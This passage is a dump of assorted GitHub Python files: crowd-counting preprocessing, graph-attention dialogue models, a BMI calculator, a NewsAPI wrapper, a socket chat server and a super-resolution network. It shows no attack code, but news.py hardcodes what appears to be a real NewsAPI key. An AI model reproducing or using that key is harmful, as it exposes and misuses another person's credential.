d_map_pw] \n px = px + p_w \n px2 = px2 + d_map_pw\n self.save_image(final_image, self.overall_count, count)\n self.save_gt(final_gt, self.overall_count, count)\n count += 1\n py = py + p_h\n py2 = py2 + d_map_ph \n\n self.overall_count += 1\n\n def get_gts(self, i):\n gt = sio.loadmat(os.path.join(self.gt_fold, self.gt_format.format(i)))\n return gt['frame'][0]\n\n def create_test_set(self):\n #p = mlt.Pool(mlt.cpu_count())\n #p.map(self._create_test_set, range(self.numfiles))\n self.overall_count = 0\n for i in range(10):\n self.sub_img_fold = os.path.join(self.img_fold, 'vidf1_33_00{}.y/'.format(i))\n self.gts = self.get_gts(i)\n\n for j in range(self.numfiles):\n self._create_test_set(i, j)\n\nif __name__ == '__main__':\n\n inputs = {\n 'img_fold': 'ST_DATA/A/test/images/',\n 'gt_fold': 'ST_DATA/A/test/ground_truth/',\n 'final_img_fold': 'st_data_A_test/images/',\n 'final_gt_fold': 'st_data_A_test/gt/'\n\n }\n inputs.update(**ST_DATA_CONFIG)\n test = CreatePatches(**inputs)\n test.create_test_set()\n test.plot_image_tiles(2)\n test.plot_dot_tiles(2)\n\n inputs = {\n 'img_fold': 'ST_DATA/A/train/images/',\n 'gt_fold': 'ST_DATA/A/train/ground_truth/',\n 'final_img_fold': 'st_data_A_train/images/',\n 'final_gt_fold': 'st_data_A_train/gt/'\n\n }\n inputs.update(**ST_DATA_CONFIG)\n test = CreatePatches(**inputs)\n test.create_test_set()\n test.plot_image_tiles(2)\n test.plot_dot_tiles(2)\n\n \n inputs = {\n 'img_fold': 'ST_DATA/B/test_data/images/',\n 'gt_fold': 'ST_DATA/B/test_data/ground_truth/',\n 'final_img_fold': 'st_data_B_test/images/',\n 'final_gt_fold': 'st_data_B_test/gt/'\n\n }\n inputs.update(**ST_DATA_CONFIG)\n test = CreatePatches(**inputs)\n test.create_test_set()\n test.plot_image_tiles(2)\n test.plot_dot_tiles(2)\n\n inputs = {\n 'img_fold': 'ST_DATA/B/train_data/images/',\n 'gt_fold': 'ST_DATA/B/train_data/ground_truth/',\n 'final_img_fold': 'st_data_B_train/images/',\n 'final_gt_fold': 'st_data_B_train/gt/'\n\n }\n inputs.update(**ST_DATA_CONFIG)\n test = CreatePatches(**inputs)\n test.create_test_set()\n test.plot_image_tiles(2)\n test.plot_dot_tiles(2) \n\n \n inputs = {\n 'img_fold': 'UCF_CC_50/',\n 'gt_fold': 'UCF_CC_50/',\n 'final_img_fold': 'ucf_data/images/',\n 'final_gt_fold': 'ucf_data/gt/',\n\n }\n inputs.update(**UCF_DATA_CONFIG)\n\n test = CreatePatches(**inputs)\n test.create_test_set()\n test.plot_image_tiles(1)\n test.plot_dot_tiles(1)\n\n \n \n inputs = {\n 'img_fold': 'ucsdpeds/vidf/',\n 'gt_fold': 'gt_1_33/',\n 'final_img_fold': 'ucsd_data/images/',\n 'final_gt_fold': 'ucsd_data/gt/'\n }\n inputs.update(**UCSD_DATA_CONFIG)\n test = CreatePatchesUCSD(**inputs)\n test.create_test_set()\n test.plot_image_tiles(40)\n test.plot_dot_tiles(40)\n \n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Elinor78/crowd-counting","sub_path":"src/create_patches.py","file_name":"create_patches.py","file_ext":"py","file_size_in_byte":11989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18556000386","text":"from typing import List, Optional\n\nfrom pydantic import BaseModel\n\n\nclass Individual_details(BaseModel):\n lastname: str\n firstname: str\n title: str\n gender: str\n occupation: Optional[str]\n birth_date: str\n address: str\n\n\nclass Insolvency_case_details(BaseModel):\n fullname: str\n court: str\n type: str\n number: str\n arrangement_date: str\n status: str\n notification_date: Optional[str] = None\n\n\nclass Practitioner_contact(BaseModel):\n fullname: List[str]\n org_name: str\n address: str\n post_code: str\n phone: str\n\n\nclass Service_contact(BaseModel):\n insolvency_service_office: List[str]\n contact: str\n address: str\n post_code: str\n phone: str\n\n\nclass Data(BaseModel):\n platform_id = 'the_insolvency_service'\n personal_info: List[Individual_details]\n case_info: List[Insolvency_case_details]\n practitioner_contact: List[Practitioner_contact]\n service_contact: List[Service_contact]\n","repo_name":"theworldcitizen/kd-crawler2","sub_path":"src/models/by_name.py","file_name":"by_name.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18199817636","text":"import torch\nfrom torch._C import device\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom transformers import BertModel\n\n\nclass GRADE(nn.Module):\n \"\"\"model code\"\"\"\n\n def __init__(self, embedding_init_value, tokenizer_len):\n super().__init__()\n self.bert_encoder = BertModel.from_pretrained(\"bert-base-uncased\")\n self.bert_encoder.resize_token_embeddings(tokenizer_len)\n self.linear_onehop_weight = torch.nn.Linear(300 * (8 + 2), 300)\n self.linear_twohop_weight = torch.nn.Linear(300 * (8 + 2), 300)\n\n self.linear0_1 = torch.nn.Linear(300 * (8 + 2), 300)\n self.linear0_2 = torch.nn.Linear(300 * (8 + 2), 300)\n self.linear0_3 = torch.nn.Linear(300 * (8 + 2), 300)\n\n self.linear1 = torch.nn.Linear(300, 512)\n self.linear2_1 = torch.nn.Linear(768, 512)\n self.linear2_2 = torch.nn.Linear(768, 512)\n self.linear3 = torch.nn.Linear(1024, 512)\n self.linear4_1 = torch.nn.Linear(512, 128)\n self.linear4_2 = torch.nn.Linear(512, 128)\n self.linear5 = torch.nn.Linear(128, 1)\n\n self.word_embedder = nn.Embedding(num_embeddings=50000, embedding_dim=300, padding_idx=0)\n self.word_embedder.weight = nn.Parameter(torch.tensor(embedding_init_value))\n self.gat_1 = GATLayer(\n in_features=300,\n out_features=300,\n alpha=0.2,\n nheads=4,\n activation=False,\n )\n self.gat_2 = GATLayer(\n in_features=300,\n out_features=300,\n alpha=0.2,\n nheads=4,\n activation=False,\n )\n self.gat_3 = GATLayer(\n in_features=300,\n out_features=300,\n alpha=0.2,\n nheads=4,\n activation=False,\n )\n\n def forward(self, input_ids, input_masks, keyword_ids, adjs):\n keyword_h_embed = self.word_embedder(keyword_ids).float()\n keyword_nonzero = torch.count_nonzero(keyword_ids, dim=1)\n bs = input_ids.size(0)\n\n # gat_1\n keyword_z_embed = self.gat_1(keyword_h_embed, adjs)\n keyword_h_embed = F.elu(\n self.linear0_1(keyword_h_embed.reshape(bs, -1)).reshape(bs, -1, 300) + keyword_z_embed\n )\n # gat_2\n keyword_z_embed = self.gat_2(keyword_h_embed, adjs)\n keyword_h_embed = F.elu(\n self.linear0_2(keyword_h_embed.reshape(bs, -1)).reshape(bs, -1, 300) + keyword_z_embed\n )\n # gat_3\n keyword_z_embed = self.gat_3(keyword_h_embed, adjs)\n keyword_h_embed = F.elu(\n self.linear0_3(keyword_h_embed.reshape(bs, -1)).reshape(bs, -1, 300) + keyword_z_embed\n )\n # mean pool\n keyword_h_embed = F.elu(\n self.linear1(torch.div(torch.sum(keyword_h_embed, dim=1), keyword_nonzero.unsqueeze(1)))\n )\n\n bert_embed = self.bert_encoder(input_ids, input_masks, return_dict=True)[\n \"last_hidden_state\"\n ][:, 0]\n\n bert_embed = self.linear2_1(bert_embed)\n\n fusion_embs = torch.cat((bert_embed, keyword_h_embed), 1)\n fusion_embs = F.elu(self.linear3(fusion_embs))\n\n linear = F.elu(self.linear4_1(fusion_embs))\n linear = self.linear5(linear)\n score = torch.sigmoid(linear).squeeze()\n return score\n\n\nclass GATHead(nn.Module):\n def __init__(self, in_features, out_features, alpha, activation=True, device=\"cpu\"):\n super(GATHead, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.activation = activation\n\n self.W = nn.Linear(in_features, out_features, bias=False)\n self.a = nn.Linear(2 * out_features, 1, bias=False)\n\n self.leakyrelu = nn.LeakyReLU(alpha)\n\n def forward(self, input, adj):\n adj = adj.type(torch.FloatTensor)\n h = self.W(input)\n (B, N, _) = adj.shape\n a_input = torch.cat([h.repeat(1, 1, N).view(B, N * N, -1), h.repeat(1, N, 1)], dim=1).view(\n B, N, -1, 2 * self.out_features\n )\n e = self.leakyrelu(self.a(a_input).squeeze(3))\n\n zero_vec = -9e15 * torch.ones_like(e)\n\n attention = torch.where(adj > 0, e, zero_vec)\n attention = attention * adj\n attention = F.softmax(attention, dim=1)\n h_prime = torch.matmul(attention, h)\n\n if self.activation:\n return F.elu(h_prime)\n else:\n return h_prime\n\n def __repr__(self):\n return (\n self.__class__.__name__\n + \" (\"\n + str(self.in_features)\n + \" -> \"\n + str(self.out_features)\n + \")\"\n )\n\n\nclass GATLayer(nn.Module):\n \"\"\"\n Graph Attention Layer, GAT paper at https://arxiv.org/abs/1710.10903\n Implementation inspired by https://github.com/Diego999/pyGAT\n \"\"\"\n\n def __init__(self, in_features, out_features, alpha, nheads=1, activation=True, device=\"cpu\"):\n \"\"\"\n :param in_features: size of the input per node\n :param out_features: size of the output per node\n :param alpha: slope of the leaky relu\n :param nheads: number of attention heads\n :param activation: whether to apply a non-linearity\n :param device: device used for computation\n \"\"\"\n super(GATLayer, self).__init__()\n assert out_features % nheads == 0\n\n self.input_head = in_features\n self.output_head = out_features // nheads\n\n self.heads = nn.ModuleList()\n for _ in range(nheads):\n self.heads.append(\n GATHead(\n in_features=self.input_head,\n out_features=self.output_head,\n alpha=alpha,\n activation=activation,\n )\n )\n\n def forward(self, input, adj):\n y = torch.cat([head(input, adj) for head in self.heads], dim=2)\n return y\n\n def __repr__(self):\n return (\n self.__class__.__name__\n + \" (\"\n + str(self.in_features)\n + \" -> \"\n + str(self.out_features)\n + \")\"\n )\n","repo_name":"nlpcl-lab/dialog_evaluation_w_hard_negative","sub_path":"graph_model.py","file_name":"graph_model.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74876916626","text":"'''\nThis file contains the BMICalculator class which performs the BMI calculations.\n'''\nclass BMICalculator:\n def calculate_bmi(self, height, weight):\n '''\n Calculates the BMI using the given height and weight.\n '''\n if height == 0:\n raise ValueError(\"Height cannot be zero.\")\n bmi = weight / ((height / 100) ** 2)\n return round(bmi, 2)\n def get_bmi_level(self, bmi):\n '''\n Returns the BMI level based on the calculated BMI.\n '''\n if bmi < 18.5:\n return \"Underweight\"\n elif bmi < 25:\n return \"Normal weight\"\n elif bmi < 30:\n return \"Overweight\"\n else:\n return \"Obese\"\n def get_weight_status(self, bmi):\n '''\n Returns the weight status based on the calculated BMI.\n '''\n if bmi < 18.5:\n return \"You are underweight.\"\n elif bmi < 25:\n return \"You have a normal weight.\"\n elif bmi < 30:\n return \"You are overweight.\"\n else:\n return \"You are obese.\"\n def get_normal_bmi(self):\n '''\n Returns the normal BMI range.\n '''\n return \"18.5 - 24.9\"\n def get_normal_weight(self, height):\n '''\n Returns the normal weight range based on the given height.\n '''\n normal_weight_min = 18.5 * ((height / 100) ** 2)\n normal_weight_max = 24.9 * ((height / 100) ** 2)\n return f\"{round(normal_weight_min, 2)} - {round(normal_weight_max, 2)}\"","repo_name":"toanctran/DevAgent","sub_path":"WareHouse/BMI Calculator 2_TT DevAgent_20231027121757/bmi_calculator.py","file_name":"bmi_calculator.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11254598090","text":"from newsapi import NewsApiClient \r\nnews = NewsApiClient(api_key='6bb8e26abfc14f30bdf9a25ff6a893bf')\r\n\r\n# Top News\r\ndef top_headlines(country=None):\r\n\ttry:\r\n\t\ttop_news = news.get_top_headlines(country=country,language='en',page_size=10)\r\n\t\ttop_headlines=[]\r\n\t\tfor i in range(len(top_news['articles'])):\r\n\t\t\t#111\r\n\t\t\ttitle = top_news['articles'][i]['title']\r\n\t\t\tif(len(title)>105):\r\n\t\t\t\ttop_headlines.append(title[:105]+'. . .')\r\n\t\t\telse:\r\n\t\t\t\ttop_headlines.append(title)\r\n\t\treturn top_headlines\r\n\texcept:\r\n\t\treturn ['No Internet Connection']*100\r\n\r\ndef top_headlines_link(country=None):\r\n\ttry:\r\n\t\ttop_news = news.get_top_headlines(country=country,language='en',page_size=10)\r\n\t\ttop_headlines_link=[]\r\n\t\tfor i in range(len(top_news['articles'])):\r\n\t\t\ttop_headlines_link.append(top_news['articles'][i]['url'])\r\n\t\treturn top_headlines_link\r\n\texcept:\r\n\t\treturn ['']*100\r\n\r\n# News By Query\r\ndef get_news(query):\r\n\ttry:\r\n\t\tquery_news = news.get_everything(q=query,language='en',page_size=20)\r\n\t\tquery_headlines=[]\r\n\t\tfor i in range(len(query_news['articles'])):\r\n\t\t\t#111\r\n\t\t\ttitle = query_news['articles'][i]['title']\r\n\t\t\tif(len(title)>105):\r\n\t\t\t\tquery_headlines.append(title[:105]+'. . .')\r\n\t\t\telse:\r\n\t\t\t\tquery_headlines.append(title)\r\n\t\tif(len(query_headlines)<20):\r\n\t\t\tquery_headlines = query_headlines + ['No Result Found, Click to see google search!']*(20-len(query_headlines))\r\n\t\treturn query_headlines\r\n\texcept:\r\n\t\treturn ['No Internet Connection']*100\r\n\r\ndef query_headlines_link(query):\r\n\ttry:\r\n\t\tquery_news = news.get_everything(q=query,language='en',page_size=20)\r\n\t\tquery_headlines_link=[]\r\n\t\tfor i in range(len(query_news['articles'])):\r\n\t\t\tquery_headlines_link.append(query_news['articles'][i]['url'])\r\n\t\tif(len(query_headlines_link)<20):\r\n\t\t\tquery_headlines_link = query_headlines_link + ['https://www.google.co.in/search?q='+query]*(20-len(query_headlines_link))\r\n\t\treturn query_headlines_link\r\n\texcept:\r\n\t\treturn ['']*100\r\n\r\n# News By Category\r\n\r\ndef cat_headlines(category='general'):\r\n\ttry:\r\n\t\tcat_news = news.get_top_headlines(category=category,country='us',page_size=20)\r\n\t\tcat_headlines=[]\r\n\t\tfor i in range(len(cat_news['articles'])):\r\n\t\t\ttitle = cat_news['articles'][i]['title']\r\n\t\t\tif(len(title)>105):\r\n\t\t\t\tcat_headlines.append(title[:105]+'. . .')\r\n\t\t\telse:\r\n\t\t\t\tcat_headlines.append(title)\r\n\t\treturn cat_headlines\r\n\texcept:\r\n\t\treturn ['No Internet Connection']*100\r\n\r\ndef cat_headlines_link(category='general'):\r\n\ttry:\r\n\t\tcat_news = news.get_top_headlines(category=category,country='us',page_size=20)\r\n\t\tcat_headlines_link=[]\r\n\t\tfor i in range(len(cat_news['articles'])):\r\n\t\t\tcat_headlines_link.append(cat_news['articles'][i]['url'])\r\n\t\treturn cat_headlines_link\r\n\texcept:\r\n\t\treturn ['']*100\r\n\r\n\r\n","repo_name":"skgtrx/Adjutor","sub_path":"module/news/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43120550453","text":"from collections import deque\nimport copy\n\n\nclass Solution(object):\n def slidingPuzzle(self, board):\n \"\"\"\n :type board: List[List[int]]\n :rtype: int\n \"\"\"\n\n sol = [[1, 2, 3], [4, 5, 0]]\n if board == sol:\n return 0\n\n # board, count, row, col\n queue = deque()\n for r in range(2):\n for c in range(3):\n if board[r][c] == 0:\n queue.append((board, 0, r, c))\n visited = {}\n visited[self.transform(board)] = 0\n\n while queue:\n board, count, r, c = queue.popleft()\n newCount = count + 1\n for row, col in [(r+1, c), (r-1, c), (r, c+1), (r, c-1)]:\n if row < 0 or row >= 2 or col < 0 or col >= 3:\n continue\n newBoard = copy.deepcopy(board)\n newBoard[r][c], newBoard[row][col] = newBoard[row][col], newBoard[r][c]\n if newBoard == sol:\n return newCount\n key = self.transform(newBoard)\n if key not in visited or newCount < visited[key]:\n visited[key] = newCount\n queue.append((newBoard, newCount, row, col))\n return -1\n\n def transform(self, board):\n ret = board[0] + board[1]\n return tuple(ret)\n","repo_name":"cathuan/LeetCode-Questions","sub_path":"python/q773.py","file_name":"q773.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70228151506","text":"# -*- coding: utf-8 -*-\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = [\n \"sphinxcontrib_robotframework\",\n]\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\nsource_encoding = 'utf-8'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'robotframework-selenium2screenshots'\ncopyright = u'Asko Soukka '\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nversion = '0.4'\n# The full version, including alpha/beta/rc tags.\nrelease = '0.4.0'\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = []\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# -- Options for HTML output --------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n# html_theme = 'pyramid'\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'robotframework-selenium2screenshots'\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n 'papersize': 'a4paper',\n}\n\nlatex_documents = [\n # (source target file, target latex name, document title,\n # author, document clas [howto/manual]),\n ('index', 'robotframework-selenium2screenshots.tex',\n u'Robot Framework Selenium2Screenshots Library Documentation',\n u'asko.soukka@iki.fi', 'manual'),\n]\n","repo_name":"collective/robotframework-selenium2screenshots","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"969025241","text":"import pkg_resources\n\n# Load plugins using pkg_resources\n\nplugins = {\n entry_point.name: entry_point.load()\n for entry_point in pkg_resources.iter_entry_points('yamljsonmodel.plugins')\n}\n\ndef process_yaml_document(yamldoc):\n\n for obj in yamldoc:\n\n kind = obj['kind']\n\n if not plugins.has_key(kind):\n raise Exception('No plugin named %s' % kind)\n\n plugin = plugins[kind]\n\n return plugin.process_yaml_object(obj)\n","repo_name":"tpot/YAMLJSONModel","sub_path":"yamljsonmodel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35855038002","text":"#! /usr/bin/[ython\n# -*- coding=utf-8 -*-\n# ! /usr/bin/[ython\n# -*- coding=utf-8 -*-\nimport pymysql\nimport xlrd\n\n\ndef con_mysql(list_cell):\n try:\n conn = pymysql.connect(\n host=\"localhost\",\n port=3306,\n user=\"root\",\n password=\"\",\n database=\"test\",\n charset=\"utf8\"\n )\n cusor = conn.cursor()\n sql = \"\"\"\n insert into testexcell (position,salary,company,address,experience,\n education,com_type,fin_situation,total_people)\n values (%s,%s,%s,%s,%s,%s,%s,%s,%s)\n \"\"\"\n for cell in list_cell:\n cusor.execute(sql,cell)\n\n except Exception as e:\n print(e)\n else:\n return cusor,conn\ndef save_file(cusor):\n sql = \"\"\"\n select * from testexcell\n \"\"\"\n content = cusor.execute(sql)\n content = cusor.fetchall()\n with open(\"1.txt\",\"w\",encoding=\"utf8\") as fp:\n for cells in content:\n for cell in cells:\n fp.write(cell)\n cusor.close()\ndef read_xlas(fina_name):\n bk = xlrd.open_workbook(filename=fina_name, encoding_override=\"gb2312\")\n bk = bk.sheets()[0]\n bk_rows = bk.nrows\n bk_cols = bk.ncols\n list_cell = []\n for i in range(bk_rows):\n cell = []\n for j in range(bk_cols):\n cell.append(bk.cell_value(i,j))\n list_cell.append(cell)\n cusor,conn = con_mysql(list_cell)\n save_file(cusor)\n conn.close()\nif __name__ == '__main__':\n read_xlas(\"./boss直聘python职位_2019-07-02.xls\")","repo_name":"NarutoJxt/d_exercise","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7155753555","text":"\nimport socket\nimport threading\n\nclients = [] #Users who use this application\n\ndef handle_client(client_socket, client_address):\n clients.append(client_socket)\n while True:\n message = client_socket.recv(1024)\n if not message:\n break\n for myself in clients: #myself is referred to the specific user, so long his not sending messages to himself, others will recieve it\n if myself != client_socket:\n myself.sendall(f\"{client_address}: {message.decode()}\".encode()) #This is so that other users will see his message instead of only him writing to himself\n clients.remove(client_socket)\n client_socket.close()\n\n\n#clients.remove(client_socket) and client_socket.close()\n#are used to handle the closing of a client connection. clients.remove(client_socket)\n#removes the client socket from the list of connected clients,\n#while client_socket.close() closes the socket, freeing up system resources and ending the connection with the client.\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind((\"0.0.0.0\", 8000)) #The ip address and port in which this application is used with\nserver_socket.listen(5)\n\nprint(\"Listening on port 8000\")\n\nwhile True: #When client_socket and adress is connected to the server_socket, it will print which clients have connected\n client_socket, client_address = server_socket.accept()\n print(f\"Accepted connection from {client_address}\")\n\n client_thread = threading.Thread(target=handle_client, args=(client_socket, client_address)) #Needed to take start the handle_client function\n client_thread.start()\n","repo_name":"Deryja/ChatApp","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73150260304","text":"from accessToken import accessToken,find_route,get_route\nfrom flask import jsonify\nd = accessToken()\n#print(d)\nheaders = {'Authorization' : 'Bearer '}\nheaders['Authorization'] = headers['Authorization'] + d\n#print(headers)\nwp_1 = [37.770581,-122.442550]\nwp_2 = [37.765297,-122.442527]\n\nuseTraffic = \"true\"\nrouteOutputFields = \"D%2CS%2CW%2CB%2CI%2CU%2CP\"\nseperator = \"%2C\"\n\nreq = f\"/findRoute?wp_1={wp_1[0]}{seperator}{wp_1[1]}&wp_2={wp_2[0]}{seperator}{wp_2[1]}&maxAlternates=1&useTraffic={useTraffic}&routeOutputFields={routeOutputFields}&format=json\"\nfind_routes = find_route(headers,req)\n\nroute_id = find_routes['result']['trip']['tripId']\nprint(\"Trip ID:\", route_id)\n\nreq = f\"/route?routeId={route_id}&useTraffic={useTraffic}&routeType=0&routeOutputFields={routeOutputFields}&format=json\"\nget_routes_result = get_route(headers,req)\nprint(get_routes_result)\n\n","repo_name":"NisargVirvadia/Let-The-Ambulance-Pass-main","sub_path":"call_api.py","file_name":"call_api.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73746210384","text":"import torch\nimport torch.nn as nn\nfrom .blocks import ConvBlock, DeconvBlock, MeanShift\nimport numpy as np\nimport random\nimport torchvision\n\n#debug = True\ndebug = False\n\nclass VGG_Feat(nn.Module):\n \"\"\"Using first 4/6/8 layers of VGG Netowrk for the RGB part\"\"\"\n def __init__(self, depth):\n super(VGG_Feat, self).__init__()\n self.depth = depth\n self.vgg_net = torchvision.models.vgg16(pretrained=True).features[:self.depth]\n def forward(self, rgb):\n rgb_feat = self.vgg_net(rgb)\n return rgb_feat\n\nclass Self_Attn(nn.Module):\n \"\"\"Implemeted using conv layers\"\"\"\n def __init__(self, in_channels):\n #super(Self_Attn, self).__init__()\n #self.conv_attn1 = nn.Sequential(nn.Conv2d(in_channels, 64, kernel_size = 3, padding=1), nn.PReLU(num_parameters=1, init=0.2))\n #self.conv_attn2 = nn.Sequential(nn.Conv2d(64, 64, kernel_size = 3, padding=1), nn.PReLU(init=0.9), nn.InstanceNorm2d(64))\n #self.conv_attn3 = nn.Sequential(nn.Conv2d(64, in_channels, kernel_size = 3, padding=1), nn.BatchNorm2d(in_channels), nn.PReLU(num_parameters=1, init=0.2))\n \n super(Self_Attn, self).__init__()\n self.conv_attn1 = nn.Sequential(nn.Conv2d(in_channels, 256, kernel_size = 3, padding=1), nn.PReLU(num_parameters=1, init=0.2))\n self.conv_attn2 = nn.Sequential(nn.Conv2d(256, 512, kernel_size = 3, padding=1), nn.PReLU(init=0.9), nn.InstanceNorm2d(512))\n self.conv_attn3 = nn.Sequential(nn.Conv2d(512, 256, kernel_size = 3, padding=1), nn.PReLU(init=0.9), nn.InstanceNorm2d(256))\n self.conv_attn4 = nn.Sequential(nn.Conv2d(256, in_channels, kernel_size = 3, padding=1), nn.InstanceNorm2d(in_channels), nn.PReLU(init=0.9))\n def forward(self, features):\n x = self.conv_attn1(features)\n # np.save('x_1', x.detach().float().cpu().numpy().sum(1)[0])\n x = self.conv_attn2(x)\n # np.save('x_2', x.detach().float().cpu().numpy().sum(1)[0])\n x = self.conv_attn3(x)\n # np.save('x_3', x.detach().float().cpu().numpy().sum(1)[0])\n x = self.conv_attn4(x)\n return x\n\nclass FeedbackBlock(nn.Module):\n def __init__(self, num_features, num_groups, upscale_factor, act_type, norm_type):\n super(FeedbackBlock, self).__init__()\n if upscale_factor == 2:\n stride = 2\n padding = 2\n kernel_size = 6\n elif upscale_factor == 3:\n stride = 3\n padding = 2\n kernel_size = 7\n elif upscale_factor == 4:\n stride = 4\n padding = 2\n kernel_size = 8\n elif upscale_factor == 8:\n print('selecting scale fact 8')\n stride = 1\n padding = 1\n kernel_size = 3\n\n self.num_groups = num_groups\n\n self.compress_in = ConvBlock(2*num_features, num_features,\n kernel_size=1,\n act_type=act_type, norm_type=norm_type)\n\n self.upBlocks = nn.ModuleList()\n self.downBlocks = nn.ModuleList()\n self.uptranBlocks = nn.ModuleList()\n self.downtranBlocks = nn.ModuleList()\n\n\n for idx in range(self.num_groups):\n self.upBlocks.append(ConvBlock(num_features, num_features,\n kernel_size=kernel_size, stride=stride, padding=padding,\n act_type=act_type, norm_type=norm_type))\n self.downBlocks.append(ConvBlock(num_features, num_features,\n kernel_size=kernel_size, stride=stride, padding=padding,\n act_type=act_type, norm_type=norm_type, valid_padding=False))\n if idx > 0:\n self.uptranBlocks.append(ConvBlock(num_features*(idx+1), num_features,\n kernel_size=1, stride=1,\n act_type=act_type, norm_type=norm_type))\n self.downtranBlocks.append(ConvBlock(num_features*(idx+1), num_features,\n kernel_size=1, stride=1,\n act_type=act_type, norm_type=norm_type))\n\n self.compress_out = ConvBlock(num_groups*num_features, num_features,\n kernel_size=1,\n act_type=act_type, norm_type=norm_type)\n\n self.should_reset = True\n self.last_hidden = None\n \n self.gamma = nn.Parameter(torch.zeros(1))\n self.attn = Self_Attn(128) \n \n def forward(self, x, rgbf):\n if self.should_reset:\n self.last_hidden = torch.zeros(x.size()).cuda()\n self.last_hidden.copy_(x)\n self.should_reset = False\n \n # print('x ', x.shape)\n\n # print('self last hidden', self.last_hidden.shape)\n x = torch.cat((x, self.last_hidden), dim=1)\n\n x = self.compress_in(x)\n # print('compressed x', x.shape)\n lr_features = []\n hr_features = []\n lr_features.append(x)\n\n for idx in range(self.num_groups):\n LD_L = torch.cat(tuple(lr_features), 1) # when idx == 0, lr_features == [x]\n if idx > 0:\n LD_L = self.uptranBlocks[idx-1](LD_L)\n LD_H = self.upBlocks[idx](LD_L)\n\n hr_features.append(LD_H)\n\n LD_H = torch.cat(tuple(hr_features), 1)\n if idx > 0:\n LD_H = self.downtranBlocks[idx-1](LD_H)\n LD_L = self.downBlocks[idx](LD_H)\n\n lr_features.append(LD_L)\n\n del hr_features\n output = torch.cat(tuple(lr_features[1:]), 1) # leave out input x, i.e. lr_features[0]\n output = self.compress_out(output)\n if debug:\n print('gamma', self.gamma)\n attn = self.attn(torch.cat([output, rgbf], 1)) \n#the scale factor of 3 has been used accidently before trainnig and hence carried forward\n#yet it doesnot have any effet as it gets compensated by self.gamma value\n fused = output * attn[:,:64,:,:] + rgbf * self.gamma * attn[:,64:,:,:] \n self.last_hidden = fused\n return fused, attn\n\n def reset_state(self):\n self.should_reset = True\n\nclass SRFBN(nn.Module):\n def __init__(self, in_channels, out_channels, num_features, num_steps, num_groups, upscale_factor, act_type = 'prelu', norm_type = None):\n super(SRFBN, self).__init__()\n\n if upscale_factor == 2:\n stride = 2\n padding = 2\n kernel_size = 6\n\n elif upscale_factor == 4:\n stride = 1\n padding = 2\n kernel_size = 3\n elif upscale_factor == 8:\n stride = 1\n padding = 3\n kernel_size = 3\n\n self.num_steps = num_steps\n self.num_features = num_features\n self.upscale_factor = upscale_factor\n\n\n\n # LR feature extraction block\n self.conv_in1 = ConvBlock(in_channels, 4*num_features,\n kernel_size=3,\n act_type=act_type, norm_type=norm_type)\n self.feat_in1 = ConvBlock(4*num_features, num_features,\n kernel_size=1,\n act_type=act_type, norm_type=norm_type)\n\n # conv2 is for rgb\n self.conv_in2 = ConvBlock(3, 4*num_features,\n kernel_size=3,\n act_type=act_type, norm_type=norm_type)\n self.conv_in2_down = ConvBlock(4*num_features,num_features,\n kernel_size=3,stride=2,\n act_type=act_type, norm_type=norm_type)\n self.feat_in2 = ConvBlock(num_features, num_features,\n kernel_size=1,\n act_type=act_type, norm_type=norm_type)\n\n\n # basic block\n self.block = FeedbackBlock(num_features, num_groups, upscale_factor, act_type, norm_type)\n # reconstruction block\n\t\t# uncomment for pytorch 0.4.0\n # self.upsample = nn.Upsample(scale_factor=upscale_factor, mode='bilinear')\n\n self.out = ConvBlock(num_features, num_features,\n kernel_size=3, stride=stride,\n act_type='prelu', norm_type=norm_type)\n \n self.conv_out = ConvBlock(num_features, out_channels,\n kernel_size=3,\n act_type='prelu', norm_type=norm_type)\n\n self.attn = Self_Attn(num_features * 2)\n self.vgg_feat = VGG_Feat(4)\n self.maxpool = 